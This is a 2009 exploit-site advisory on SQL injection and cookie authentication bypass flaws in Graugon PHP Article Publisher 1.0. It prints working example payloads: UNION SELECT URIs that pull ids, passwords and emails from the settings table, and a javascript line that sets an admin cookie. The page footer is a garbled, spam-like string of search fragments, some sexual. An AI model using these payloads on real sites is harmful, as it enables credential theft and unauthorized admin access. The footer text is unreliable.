about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Graugon PHP Article Publisher SQL Injection and Cookie Authentication Bypass Vulnerabilities


Title Graugon PHP Article Publisher SQL Injection and Cookie Authentication Bypass Vulnerabilities
Published 2009-03-02-12:00AM
Updated 2009-03-04-06:36PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  x0r
Vulnerable  Graugon PHP Article Publisher 1.0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available: http://www.example.com/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
http://www.example.com/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settingsThe following data is also available:javascript:document.cookie ="g_admin=1; path=/"
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 05 Dec 2009 17:20:53 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo cent os 200 /compo canl&a PITCH SIX lahorsex.c Video gadi /search/ex trosha bat sexo en vi 6270 Dessi baba mambo Remo harry pott Www102030t www.sexboy www.slin8. Wellpaper www.devaya 6.0 bacteria t exploits+f anak smu b phpBB por 5921la.5d6 sakura and Film sek a shellbots 5EP0F1FOKI phpBB por osi scanner GIRL HAVIN northsex vidio ayu 5GP040AOKE Tiresa sex search/exp www.gp9111 GIRL HAVIN Mobile ant img.php?lo 5.0 ftp wi sex malay trishasexy www.gamesb m...s/view www inthev 4pig moterhead